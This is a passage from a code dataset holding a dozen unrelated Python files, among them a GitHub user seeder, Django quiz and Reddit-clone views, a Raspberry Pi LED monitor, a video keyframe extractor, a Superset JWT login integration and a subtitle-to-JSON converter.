VARCHAR, ghid integer, image_url VARCHAR, ghtype VARCHAR, link VARCHAR);'\n# sql statement for deleting previous 
data\nsqlDeletePreviousEntries = 'DELETE FROM user;'\n\ndef createConnection():\n \"\"\" create a database connection to a database that resides\n in the same folder as this script\n :return: db connection\n \"\"\"\n conn = None;\n try:\n conn = sqlite3.connect('app/users.db')\n except sqlite3.Error as e:\n print(e)\n finally:\n return conn\n\ndef createTable(conn, create_table_sql):\n \"\"\" create a table from the create_table_sql statement\n :param conn: Connection object\n :param create_table_sql: a CREATE TABLE statement\n :return:\n \"\"\"\n try:\n c = conn.cursor()\n c.execute(create_table_sql)\n c.execute(sqlDeletePreviousEntries)\n except sqlite3.Error as e:\n print(e)\n\ndef createUsers(conn, users):\n \"\"\" insert users in to the provided DB\n :param conn: Connection object\n :param users: list of users to be inserted in the database\n :return: lastrowid from the insert\n \"\"\"\n sql = 'INSERT INTO user(username, ghid, image_url, ghtype, link) VALUES (?, ?, ?, ?, ?);'\n cursor = conn.cursor()\n cursor.executemany(sql, users)\n conn.commit()\n return cursor.lastrowid\n\ndef getUsers(nUsers=150, timeout=10):\n \"\"\" retrive the amount of users from github\n :param nUsers: total number of users to retrive default 150\n :param timeout: timeout for the requests default 10 seconds\n :return: list of users\n \"\"\"\n #test if the requested users are more than 100 because\n #thats the max amount allowed per request\n maxAmount = 100\n\n if nUsers > maxAmount:\n parameters = {'per_page': maxAmount}\n else:\n parameters = {'per_page': nUsers}\n petitions = [maxAmount] * (int(nUsers/maxAmount) - 1)\n if nUsers%maxAmount != 0 and nUsers > maxAmount:\n petitions.append(nUsers%maxAmount)\n url = 'https://api.github.com/users'\n try:\n userRows = []\n response = requests.get(url, params=parameters, timeout=timeout)\n users = response.json()\n for petition in petitions:\n url = response.links['next']['url']\n response = requests.get(url, timeout=timeout)\n users = users + response.json()[:petition]\n for user in users:\n userRows.append((user['login'], user['id'], user['avatar_url'], user['type'], user['html_url']))\n return userRows\n except Exception as e:\n print('an error occured when retriving users: {}'.format(e))\n\ndef main(total=150):\n db = createConnection()\n createTable(db, sqlUsersTable)\n\n users = getUsers(total)\n createUsers(db, users)\n\nif __name__ == '__main__':\n args = sys.argv\n total = 150\n if len(args) == 2:\n total = int(args[1])\n print(total)\n main(total)\n","sub_path":"seed.py","file_name":"seed.py","file_ext":"py","file_size_in_byte":3054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"471067561","text":"import os\nimport importlib\nimport logging\nfrom .posixfs_context import LocalFSState\n\nfrom ..utils import handler_decorator\n\nlog = logging.getLogger(__name__)\n\nstatehandlers, stateloader = handler_decorator()\n\n\n@stateloader(\"frompython\")\ndef frompython_stateloader(jsondata, **opts):\n statestring = opts[\"statestring\"]\n _, module, stateclass = statestring.split(\":\")\n module = importlib.import_module(module)\n stateclass = getattr(module, stateclass)\n stateopts = {}\n return stateclass.fromJSON(jsondata, **stateopts)\n\n\n@stateloader(\"localfs\")\ndef localfs_stateloader(jsondata, **opts):\n return LocalFSState.fromJSON(jsondata)\n\n\n@stateloader(\"fromenv\")\ndef fromenv_stateloader(jsondata, **opts):\n module = 
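seed.py above follows GitHub's pagination through the `Link` response header, which `requests` exposes as `response.links`. A condensed sketch of that loop (endpoint and page count are illustrative):

```python
# Hedged sketch of the pagination pattern in seed.py above: keep following
# response.links["next"] until enough pages are collected. Values illustrative.
import requests

def fetch_pages(url, pages, **params):
    collected = []
    response = requests.get(url, params=params, timeout=10)
    collected.extend(response.json())
    for _ in range(pages - 1):
        if "next" not in response.links:
            break  # no further pages advertised by the Link header
        response = requests.get(response.links["next"]["url"], timeout=10)
        collected.extend(response.json())
    return collected

# e.g. fetch_pages("https://api.github.com/users", pages=2, per_page=100)
```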
importlib.import_module(os.environ[\"PACKTIVITY_STATEPROVIDER\"])\n return module.load_state(jsondata)\n\n\ndef load_state(jsondata, deserialization_opts=None):\n log.debug(\"load_state opts %s\", deserialization_opts)\n deserialization_opts = deserialization_opts or {}\n if \"state\" in deserialization_opts:\n statestring = deserialization_opts.get(\"state\", \"\")\n if statestring.startswith(\"py:\"):\n return statehandlers[\"frompython\"][\"default\"](\n jsondata, statestring=statestring\n )\n\n if \"PACKTIVITY_STATEPROVIDER\" in os.environ:\n return statehandlers[\"fromenv\"][\"default\"](jsondata)\n\n if jsondata[\"state_type\"] in statehandlers:\n return statehandlers[jsondata[\"state_type\"]][\"default\"](jsondata)\n\n raise TypeError(\"unknown state type {}\".format(jsondata[\"state_type\"]))\n","sub_path":"packtivity/statecontexts/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"8914283","text":"# Defining Game Lexicon\r\ngame_lexicon = {\r\n 'direction' : ['north', 'south', 'east', 'west', 'down', 'up', 'left', 'right', 'back'],\r\n 'verb' : ['go', 'stop', 'kill', 'eat'],\r\n 'stop' : ['the', 'in', 'of', 'from', 'at', 'it'],\r\n 'numbers' : [i for i in range(0, 10)]}\r\n\r\ndef getTag(word, LexiconDict):\r\n \"\"\"\r\n A Function to parse a dictionary of list-of-tokens for scanning.\r\n Return a tuple of (tag, token)\r\n \"\"\"\r\n tokenizedWord = None\r\n\r\n for key, value in LexiconDict.items():\r\n # First to see if it's a number\r\n try:\r\n int(word)\r\n tokenizedWord = ('number', int(word))\r\n except ValueError:\r\n # If it's not a number, try to see if it's within our lexicon\r\n try:\r\n if word.lower() in LexiconDict.get(key):\r\n tokenizedWord = (key, word)\r\n break\r\n # if it's all uppercase, we can assume it's an error as well\r\n elif word.upper() == word:\r\n tokenizedWord = ('error', word)\r\n break\r\n # if not, it will be a noun, some object\r\n else:\r\n tokenizedWord = ('noun', word)\r\n # if some unknown variable type is parsed\r\n except AttributeError:\r\n tokenizedWord = ('error', word)\r\n except TypeError:\r\n tokenizedWord = ('error', word)\r\n return tokenizedWord\r\n\r\n\r\ndef scan(AString):\r\n \"\"\"\r\n The scan function will take a string and tokenize it into\r\n list of string, and do the scanning based on the game_lexicon\r\n and return a list of tuples in format of (tag, token)\r\n \"\"\"\r\n listOfStrings = AString.split()\r\n\r\n listOfTags = []\r\n for i in listOfStrings:\r\n tokenTag = getTag(i, game_lexicon)\r\n listOfTags.append(tokenTag)\r\n\r\n return listOfTags\r\n","sub_path":"ex48/ex48/lexicon.py","file_name":"lexicon.py","file_ext":"py","file_size_in_byte":1934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"635879525","text":"from django.shortcuts import render\nfrom .TestQuizWithoutDB import *\n\n\n\ndef start(request):\n quiz = TestQuiz.quiz_dto\n return render(request, 'Quiz_app/StartScreen.html', {'quizname': quiz.title})\n\n\ndef question(request):\n if request.method == 'POST':\n if 'answer' in request.POST:\n if request.POST['c_question'] ==TestQuiz.quiz_dto.questions[TestQuiz.question_id].uuid:\n TestQuiz.question_id += 1\n answers = request.POST.getlist('answer')\n answered_question = request.POST['c_question']\n TestQuiz.answers_dto.answers.append(AnswerDTO(answered_question, answers))\n if TestQuiz.question_id < 
len(TestQuiz.quiz_dto.questions):\n end = False\n else:\n return result(request)\n if TestQuiz.question_id == len(TestQuiz.quiz_dto.questions)-1:\n end = True\n current_question = TestQuiz.quiz_dto.questions[TestQuiz.question_id]\n current_choices = (x for x in current_question.choices if current_question.uuid + '-' in x.uuid)\n return render(request, 'Quiz_app/QuestionPage.html', {'question': current_question,\n 'choices': current_choices,\n 'end': end})\n\n\ndef result(request):\n TestQuiz.question_id = 0\n qrs = QuizResultService(TestQuiz.quiz_dto, TestQuiz.answers_dto)\n score = qrs.get_result() * 100\n TestQuiz.answers_dto = AnswersDTO(\"1\", [])\n return render(request, 'Quiz_app/ResultPage.html', {'quizname':TestQuiz.quiz_dto.title,'score': score})\n","sub_path":"Quiz_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"568308049","text":"from Laboration6Library import *\n\n\ndef main():\n\n numberString = input(\"Ange ett tryck:\")\n unit = input(\"Från vilken sort?:\")\n pressureDict = {\"mbar\": [\"torr\", 1013],\n \"torr\": [\"pascal\", 760],\n \"pascal\": [\"atm\", 101325],\n \"atm\": [\"mbar\", 1]}\n\n while not checkIfValidSort(unit, pressureDict):\n print(\"Enheten måste matas in som en av definierade tryckenheterna (mbar, pascal, atm eller torr).\")\n unit = input(\"Försök igen: \")\n while not checkIfValidNumber(numberString):\n print(\"Trycket måste skrivas in som ett tal.\")\n numberString = input(\"Försök igen: \")\n\n number = convertToNextValue(numberString, unit, pressureDict)\n unit = nextUnit(unit, pressureDict)\n print(\"Konverterat till nästkommande tryckenhet blir trycket: \", number, unit)\n\n\nmain()","sub_path":"Laborationer/Laboration_6_copy/Laboration62.py","file_name":"Laboration62.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"190576104","text":"from django.shortcuts import render, reverse, HttpResponseRedirect\nfrom django.views import View\n\nfrom Post.models import RedditPost, Comment\nfrom Post.forms import PostForm\n\nfrom User.models import RedditUser\n\n# Modified version of Ramon's views https://github.com/rhami223/reddit_emerald/blob/fd9ea13fc5f4775d5bfe6f52e72edd977d1ffc15/Post/views.py\n\ndef upvote_post_view(request, post_id):\n post = RedditPost.objects.get(id=post_id)\n post.votes += 1\n post.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER', '/'))\n\ndef downvote_post_view(request, post_id):\n post = RedditPost.objects.get(id=post_id)\n post.votes -= 1\n post.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER', '/'))\n\n##\n\ndef upvote_comment_view(request, comment_id):\n c = Comment.objects.get(id=comment_id)\n c.votes += 1\n c.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER', '/'))\n\ndef downvote_comment_view(request, comment_id):\n c = Comment.objects.get(id=comment_id)\n c.votes -= 1\n c.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER', '/'))\n\ndef post_detail_view(request, post_id):\n post = RedditPost.objects.get(id=post_id)\n comments = Comment.objects.filter(on_post=post_id)\n return render(request, 'post_detail.html',{\n 'post': post,\n 'comments': comments\n })\n\nclass PostFormView(View):\n def get(self, request):\n form = PostForm()\n return render(request, \"generic_form.html\", {\"form\": form})\n \n def post(self, 
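The pressure-conversion lab above imports `nextUnit` and `convertToNextValue` from Laboration6Library, whose source is not shown. One plausible reconstruction, offered purely as an assumption: each table entry holds [next unit, units-per-atmosphere], so converting is a normalise-then-scale step.

```python
# Assumed reconstruction of the two Laboration6Library helpers imported above
# (the real module is not shown). The table maps each unit to
# [next unit, units-per-atmosphere]: 1013 mbar = 760 torr = 101325 Pa = 1 atm.
pressureDict = {"mbar": ["torr", 1013],
                "torr": ["pascal", 760],
                "pascal": ["atm", 101325],
                "atm": ["mbar", 1]}

def nextUnit(unit, table):
    return table[unit][0]

def convertToNextValue(value, unit, table):
    nxt = table[unit][0]
    # normalise to atmospheres, then scale into the next unit
    return float(value) / table[unit][1] * table[nxt][1]

print(convertToNextValue(1013, "mbar", pressureDict))  # -> 760.0 (torr)
```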
request):\n form = PostForm(request.POST)\n if form.is_valid():\n data = form.cleaned_data\n new_post = RedditPost.objects.create(\n title=data.get('title'),\n content=data.get('content'),\n url=data.get('url'),\n subreddit_parent=data.get('subreddit_parent'),\n user_posted=request.user\n )\n redirect_url = '/post/' + str(new_post.id) + '/'\n return HttpResponseRedirect(redirect_url)\n\ndef deletePost(request, post_id):\n post = RedditPost.objects.get(id=post_id)\n post.delete()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER', '/'))","sub_path":"Post/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"372719157","text":" #!/usr/bin/env python3\n #coding=utf-8\n\nimport RPi.GPIO as GPIO\nimport time\nimport os\nimport threading\nimport datetime\nfrom pathlib import Path\nfrom subprocess import check_output, CalledProcessError\n\ndef check_connection(dev):\n ret = False\n path = '/sys/class/net/{}'.format(dev)\n if Path(path).exists():\n try:\n operstate = check_output(['cat', '{}/operstate'.format(path)]).decode().strip()\n except CalledProcessError as err:\n operstate = 'down'\n print('CalledProcessError:', err)\n print('operstate = {}'.format(operstate))\n try:\n carrier = check_output(['cat', '{}/carrier'.format(path)]).decode().strip()\n except CalledProcessError as err:\n carrier = '0'\n print('CalledProcessError:', err)\n print('carrier = {}'.format(carrier))\n\n if operstate == 'up' and carrier == '1':\n ret = True\n\n return ret\n\ndef check_dataflow(dev):\n ret = False\n # for EQ\n if dev == 'eth0':\n print(dev)\n p = Path('/home/rp/.data_gather/Core/connectivity.pk')\n mt = p.stat().st_mtime\n td = datetime.datetime.now() - datetime.datetime.fromtimestamp(mt)\n print('{}:{} -> {}'.format(p.name, td, td.total_seconds()))\n if td.total_seconds() > 60*2:\n ret = False\n print('overtime')\n else:\n # print('non-block')\n ret = True\n\n # for IT\n else:\n print(dev)\n for p_iter in Path('/home/rp/TypeE').iterdir():\n if p_iter.is_file():\n mt = p_iter.stat().st_mtime\n td = datetime.datetime.now() - datetime.datetime.fromtimestamp(mt)\n print('{}:{} -> {}'.format(p_iter.name, td, td.total_seconds()))\n if td.total_seconds() > 60*2:\n # print('overtime')\n ret = False\n break\n else:\n print('else')\n ret = True\n\n print('ret =', ret)\n return ret\n\n\ndef thread_job(dev, light_green, light_oragne):\n GPIO.setup(light_green, GPIO.OUT)\n GPIO.setup(light_oragne, GPIO.OUT)\n\n while 1:\n if check_connection(dev):\n if check_dataflow(dev):\n GPIO.output(light_green, GPIO.HIGH)\n time.sleep(1)\n GPIO.output(light_green, GPIO.LOW)\n GPIO.output(light_oragne, GPIO.HIGH)\n time.sleep(1)\n GPIO.output(light_oragne, GPIO.LOW)\n else:\n GPIO.output(light_green, GPIO.HIGH)\n GPIO.output(light_oragne, GPIO.HIGH)\n time.sleep(1)\n else:\n GPIO.output(light_green, GPIO.HIGH)\n GPIO.output(light_oragne, GPIO.HIGH)\n time.sleep(0.2)\n GPIO.output(light_green, GPIO.LOW)\n GPIO.output(light_oragne, GPIO.LOW)\n time.sleep(0.2)\n\nif __name__ == '__main__':\n GPIO.setmode(GPIO.BCM)\n GPIO.setwarnings(False)\n GPIO.cleanup()\n pin_dict = {'eq_green':23, 'eq_orange':24, 'it_green':16, 'it_orange':20}\n pin_list = [pin_dict['eq_green'], pin_dict['eq_orange'], pin_dict['it_green'], pin_dict['it_orange']]\n\n thread_eq = threading.Thread(target = thread_job, args = ('eth0', pin_dict['eq_green'], pin_dict['eq_orange']))\n thread_it = threading.Thread(target = thread_job, 
args = ('eth1', pin_dict['it_green'], pin_dict['it_orange']))\n\n thread_eq.start()\n thread_it.start()\n\n thread_eq.join()\n thread_it.join()\n # check_dataflow('eth1')\n","sub_path":"DGM TypeE/rp/data_gather/Core/monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":3552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"24342522","text":"import pickle\n\nfrom draw import *\nfrom util import *\nfrom three_hidden_rmlp import *\n\nweight_low = -0.015\nweight_high = 0.025\ninput_size = 14\nr_fc1_size = 69\nr_fc2_size = 42\nr_fc3_size = 21\nout_fc_size = 2\n\nlow = -0.95\nhigh = 0.95\ntrain_size = 6\ntarget_size = 2\nlr = 0.00225\nepoch_count = 8000\nparameters_file_name = \"../3hiddenLayer/model/model_3\"\n\n\n\ndef unpack(array: np.ndarray):\n return np.array([i[0] for i in array]), np.array([i[1] for i in array])\n\n\ndef load_model(model_path: str) -> (np.ndarray, np.ndarray, np.ndarray, float, float):\n with open(model_path, 'rb') as parameters_file:\n w1, w2, w3, stored_lr, stored_epoch_count = pickle.load(parameters_file)\n return w1, w2, w3, stored_lr, stored_epoch_count\n\n\ndef calc_metrics(outputs: np.ndarray, target: np.ndarray, type_str: str = \"test\"):\n real_g, real_kgf = unpack(target)\n model_g, model_kgf = unpack(outputs)\n rmse_g = rmse(real_g, model_g)\n rmse_kgf = rmse(real_kgf, model_kgf)\n fig_total = draw_model_real(model_g, real_g, \"g_total \" + type_str, \"iter\", \"value\", \"red\", \"green\")\n fig_kgf = draw_model_real(model_kgf, real_kgf, \"kgf \" + type_str, \"iter\", \"value\", \"red\", \"green\")\n print(type_str)\n print(\"g_total_rmse: \", rmse_g, \"%\")\n print(\"kgf_rmse: \", rmse_kgf, \"%\")\n save_param_to_html(fig_kgf, parameters_file_name, \"kgf_\" + type_str + \".html\")\n save_param_to_html(fig_total, parameters_file_name, \"total_\" + type_str + \".html\")\n\n\ndef main():\n train_input, train_target, test_input, test_target = load_data(\"../data.csv\", train_size, target_size, low, high)\n rmlp = ThreeHiddenRmlp(input_size, r_fc1_size, r_fc2_size, r_fc3_size, out_fc_size, weight_low, weight_high)\n cost_list = rmlp.fit(lr, epoch_count, list(zip(train_input, train_target)), parameters_file_name)\n train_cost = draw_cost(np.array(cost_list), \"epoch\", \"mse\", \"cost_train\")\n res, _ = rmlp.eval(list(zip(train_input, train_target)))\n res1, test_mse = rmlp.eval(list(zip(test_input, test_target)))\n test_cost = draw_cost(np.array(test_mse), \"iter\", \"mse\", \"cost_test\")\n calc_metrics(np.array(res), train_target, \"train\")\n calc_metrics(np.array(res1), test_target, \"test\")\n save_param_to_html(train_cost, parameters_file_name, \"train_cost.html\")\n save_param_to_html(test_cost, parameters_file_name, \"test_cost.html\")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"rmlp/3hiddenLayer/three_main.py","file_name":"three_main.py","file_ext":"py","file_size_in_byte":2378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"85080890","text":"import os\nimport cv2\nimport numpy as np\nimport time\nimport glob\nfrom PIL import Image\nimport peakutils\n\nclass KeyFramesType:\n '''\n # frame_dict\n \"source_url: \"path/to/source,\n \"frames\": \n [\n {\n \"index\": 0,\n \"at\": xx,\n \"path\": \"path/to/frame\"\n }\n ]\n '''\n def __init__(self, source_url):\n self.source_url = source_url\n self.frames_list = []\n \n def add_frame(self, frame_dict):\n self.frames_list.append(frame_dict)\nclass KeyFrameExtractor:\n 
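monitor.py above treats a data flow as healthy only if every file under a watched directory was modified recently. The staleness test in isolation (directory name and threshold are illustrative):

```python
# Compact form of the staleness check in monitor.py above: a flow counts as
# healthy only if every file in the watched directory changed within the last
# two minutes. Directory name and threshold are illustrative.
import datetime
from pathlib import Path

def is_fresh(directory, max_age_seconds=120):
    now = datetime.datetime.now()
    for path in Path(directory).iterdir():
        if path.is_file():
            age = now - datetime.datetime.fromtimestamp(path.stat().st_mtime)
            if age.total_seconds() > max_age_seconds:
                return False
    return True

# e.g. is_fresh('/home/rp/TypeE')
```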
\n def light_significant_change_detect(self, source, dest, thres, verbose=False):\n keyframePath = dest\n self.__prepare_dirs(keyframePath)\n\n cap = cv2.VideoCapture(source)\n length = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\n \n if (cap.isOpened()== False):\n print(\"Error opening video file\")\n\n fps = self.__get_frames_per_seconds(cap)\n interval_end = 0\n\n lastFrame = None\n cnt = 1\n\n key_frames_obj = KeyFramesType(source)\n\n for i in range(length):\n ret, frame = cap.read()\n grayframe, blur_gray = self.__convert_frame_to_grayscale(frame)\n if lastFrame is not None:\n diff = cv2.subtract(blur_gray, lastFrame)\n diffMag = cv2.countNonZero(diff)\n \n \n\n height, width = blur_gray.shape\n resolution = height * width\n if diffMag / resolution > thres:\n interval_end = i/fps\n path = os.path.join(keyframePath , 'keyframe'+ str(cnt) +'.jpg')\n cv2.imwrite(path, frame)\n frame_dict = {\n 'index': cnt,\n 'path': path,\n 'at': interval_end\n }\n \n key_frames_obj.add_frame(frame_dict)\n if(verbose):\n print(frame_dict)\n cnt += 1\n lastFrame = blur_gray\n\n cap.release()\n cv2.destroyAllWindows()\n return key_frames_obj\n\n def significant_change_detect(self, source, dest, Thres, verbose=False):\n keyframePath = dest\n self.__prepare_dirs(keyframePath)\n\n cap = cv2.VideoCapture(source)\n length = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\n\n if (cap.isOpened()== False):\n print(\"Error opening video file\")\n\n fps = self.__get_frames_per_seconds(cap)\n interval_end = 0\n key_frames_obj = KeyFramesType(source)\n\n lstfrm = []\n lstdiffMag = []\n full_color = []\n lastFrame = None\n cnt = 1\n \n # Read until video is completed\n for i in range(length):\n ret, frame = cap.read()\n grayframe, blur_gray = self.__convert_frame_to_grayscale(frame)\n\n frame_number = cap.get(cv2.CAP_PROP_POS_FRAMES) - 1\n lstfrm.append(i)\n full_color.append(frame)\n if frame_number == 0:\n lastFrame = blur_gray\n\n diff = cv2.subtract(blur_gray, lastFrame)\n diffMag = cv2.countNonZero(diff)\n lstdiffMag.append(diffMag)\n lastFrame = blur_gray\n\n if (i == length-1) or (i % 1000 == 0 and i):\n y = np.array(lstdiffMag)\n base = peakutils.baseline(y, 2)\n indices = peakutils.indexes(y-base, Thres, min_dist=1)\n \n for x in indices:\n frame_path = os.path.join(keyframePath , 'keyframe'+ str(cnt) +'.jpg') \n cv2.imwrite(frame_path, full_color[x])\n interval_end = lstfrm[x]/fps\n frame_dict = {\n 'index': cnt,\n 'path': frame_path,\n 'at': interval_end\n }\n key_frames_obj.add_frame(frame_dict)\n cnt += 1\n if(verbose):\n print(frame_dict)\n \n lstfrm = []\n lstdiffMag = []\n full_color = []\n\n cap.release()\n cv2.destroyAllWindows()\n return key_frames_obj\n \n def __get_frames_per_seconds(self, cap):\n fps = round(cap.get(cv2.CAP_PROP_FPS))\n return fps\n\n def __scale(self, img, xScale, yScale):\n res = cv2.resize(img, None, fx=xScale, fy=yScale, interpolation=cv2.INTER_AREA)\n return res\n\n\n def __crop(self, infile, height, width):\n im = Image.open(infile)\n imgwidth, imgheight = im.size\n for i in range(imgheight // height):\n for j in range(imgwidth // width):\n box = (j * width, i * height, (j + 1) * width, (i + 1) * height)\n yield im.crop(box)\n\n\n def __averagePixels(self, path):\n r, g, b = 0, 0, 0\n count = 0\n pic = Image.open(path)\n for x in range(pic.size[0]):\n for y in range(pic.size[1]):\n imgData = pic.load()\n tempr, tempg, tempb = imgData[x, y]\n r += tempr\n g += tempg\n b += tempb\n count += 1\n return (r / count), (g / count), (b / count), count\n\n\n def 
__convert_frame_to_grayscale(self, frame):\n grayframe = None\n gray = None\n if frame is not None:\n cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n gray = self.__scale(gray, 1, 1)\n grayframe = self.__scale(gray, 1, 1)\n gray = cv2.GaussianBlur(gray, (9, 9), 0.0)\n return grayframe, gray\n\n\n def __prepare_dirs(self, keyframePath):\n if not os.path.exists(keyframePath):\n os.makedirs(keyframePath)\n files = glob.glob(keyframePath + \"/*\")\n for f in files:\n os.remove(f)","sub_path":"engine/keyframes.py","file_name":"keyframes.py","file_ext":"py","file_size_in_byte":6023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"613215298","text":"from flask import redirect, g, flash, request,make_response,session\nfrom flask_appbuilder.security.views import UserDBModelView,AuthDBView\nfrom superset.security import SupersetSecurityManager\nfrom flask_appbuilder.security.views import expose\nfrom flask_appbuilder.security.manager import BaseSecurityManager\nfrom flask_login import login_user, logout_user\nimport jwt\nimport os\nimport educar_connection\nimport logging\nimport re\n\ndef login_or_create(appbuilder,jwt_token):\n jwt_key = os.environ.get(\"APP_JWT_KEY_EDUCAR\")\n jwt_audience = os.environ.get(\"APP_JWT_AUDIENCE_EDUCAR\")\n try:\n jwt_data = jwt.decode(jwt_token, jwt_key ,algorithms=['HS256'],verify=True,audience=jwt_audience)\n except Exception as ex:\n logging.error(str(ex))\n flash('Não foi possível autenticar. JWT inválido', 'warning')\n return None\n\n user_to_use = jwt_data[\"username\"]+\"_\"+jwt_data[\"codigo_educar\"]\n user = appbuilder.sm.find_user(username=user_to_use)\n \n if user is None:\n given_name = jwt_data[\"given_name\"]\n first_name = given_name.split(\" \")[0]\n last_name = \" \".join(given_name.split(\" \")[1:])\n\n new_user = appbuilder.sm.add_user(\n username=user_to_use,\n first_name=first_name,\n last_name=last_name,\n email=jwt_data[\"email\"],\n role=appbuilder.sm.find_role(\"Educar\"),\n password=\"\".join(jwt_token[0:10])\n )\n if not new_user:\n flash('Não foi possível autenticar. 
Erro ao criar novo usuário', 'warning')\n return None\n user = new_user\n # user = self.appbuilder.sm.find_user(username=username)\n \n login_user(user, remember=False,force=True)\n return True\n \ncache_dict = {}\ndef DB_CONNECTION_MUTATOR(uri, params, username, security_manager, source):\n if str(uri).endswith(\"educar\"):\n # self.drivername = drivername\n # self.username = username\n # self.password_original = password\n # self.host = host\n # if port is not None:\n # self.port = int(port)\n # else:\n # self.port = None\n # self.database = database\n # self.query = query or {}\n user = security_manager.find_user(username=username)\n regex = r\"\\_(\\d+)$\"\n result = re.findall(regex,security_manager.current_user.username)\n if len(result) > 0:\n tenant_id = result[0]\n connection_info = educar_connection.get_connection_info(tenant_id)\n #if tenant_id in cache_dict:\n # connection_info = cache_dict[tenant_id]\n #else:\n # connection_info = educar_connection.get_connection_info(tenant_id)\n # cache_dict[tenant_id] = connection_info\n if connection_info:\n uri.username = connection_info[\"user\"]\n uri.password_original = connection_info[\"password\"]\n uri.host = connection_info[\"host\"]\n uri.database = connection_info[\"db\"]\n uri.port = connection_info[\"port\"]\n return uri, params","sub_path":"local_app/educar_integracao.py","file_name":"educar_integracao.py","file_ext":"py","file_size_in_byte":3098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"247929322","text":"import cv2\n\nsrcImage = cv2.imread(\"1.jpg\")\ncv2.imshow(\"text_image\",srcImage)\n\ngrayImage = cv2.cvtColor(srcImage,cv2.COLOR_BGR2GRAY) # convert the source image to grayscale\nedge = cv2.blur(grayImage,(3,3)) # mean filter to reduce noise\nedge = cv2.Canny(edge,3,9,3) # run the Canny edge detector\ncv2.imshow(\"edge_image\",edge)\n\ncv2.waitKey(5000)\n\n","sub_path":"1.基础操作/canny边缘检测.py","file_name":"canny边缘检测.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"125261374","text":"#!/usr/bin/python3\n\nimport xml.etree.ElementTree as ET\nimport datetime\nimport os\nimport json\nfrom gzip import GzipFile\nimport re\nimport pprint\n\ndef filesInDir(dirname):\n result = []\n for dirpath, dirs, files in os.walk(dirname):\n for filename in files:\n fname = os.path.join(dirpath, filename)\n result.append(fname)\n return result\n\ndef genList(tree):\n root = tree.getroot()\n\n timeFormat = '%H:%M:%S'\n maxDelta = datetime.timedelta(seconds=1)\n\n startTime = datetime.datetime.min\n strbuf = ''\n sentList = []\n\n for child in root:\n for elem in child:\n if elem.tag == 'time':\n elemID = elem.attrib['id']\n elemVal = elem.attrib['value'][:-4]\n if elemID[-1] == 'S':\n startTime = datetime.datetime.strptime(elemVal, timeFormat)\n else:\n sentList.append((strbuf.strip(), startTime, datetime.datetime.strptime(elemVal, timeFormat)))\n strbuf = ''\n else:\n try:\n strbuf = strbuf + \" \" + elem.text\n except:\n pass\n\n resultPairs = []\n for idx in range(0, len(sentList) - 1):\n cur = sentList[idx]\n nxt = sentList[idx + 1]\n if nxt[1] - cur[2] <= maxDelta and cur and nxt:\n tmp = {}\n tmp['question'] = cur[0].replace('\\\\\\'','\\'')\n tmp['answer'] = nxt[0].replace('\\\\\\'', '\\'')\n tmp['docId'] = \"OpenSubtitles\"\n tmp['qSentId'] = 20160110\n tmp['aSentId'] = 20160110\n resultPairs.append(tmp)\n return resultPairs\n\ndef getXML(filepath):\n fext = os.path.splitext(filepath)[1]\n if fext == '.gz':\n tmp = GzipFile(filename=filepath)\n 
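keyframes.py above (the `significant_change_detect` method) selects keyframes by detrending per-frame difference magnitudes with `peakutils.baseline` and picking peaks with `peakutils.indexes`. The core computation in isolation, on fabricated magnitudes:

```python
# The core of the peak-based keyframe selection in keyframes.py above:
# detrend the frame-difference magnitudes with a polynomial baseline, then
# keep peaks above a relative threshold. The magnitudes here are fabricated.
import numpy as np
import peakutils

diff_magnitudes = np.array([0, 5, 120, 8, 4, 200, 6, 3], dtype=float)
baseline = peakutils.baseline(diff_magnitudes, 2)
indices = peakutils.indexes(diff_magnitudes - baseline, thres=0.3, min_dist=1)
print('keyframe indices:', indices)  # peaks at positions 2 and 5
```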
return ET.parse(tmp)\n else:\n return ET.parse(filepath)\n\ndef genForDir(dirname):\n pat = re.compile('\\\\.xml.*', re.DOTALL)\n\n dirList = filesInDir(dirname)\n for filepath in dirList:\n outputName = 'json' + re.sub(pat, '.json', filepath[1:])\n try:\n doc = getXML(filepath)\n result = genList(doc)\n if not os.path.exists(os.path.dirname(outputName)):\n os.makedirs(os.path.dirname(outputName))\n with open(outputName, 'w') as outputFile:\n json.dump(result, outputFile)\n print(outputName + \" written from \" + filepath)\n except:\n pass\n\n\n\na = datetime.datetime.now()\ndirtest = './en/'\ngenForDir(dirtest)\nb = datetime.datetime.now()\nprint('\\nTotal time:')\nprint(b - a)\n\n","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"629759233","text":"#!/usr/bin/env python3\n\nimport os\nimport math\nimport sys\nimport re\npath = 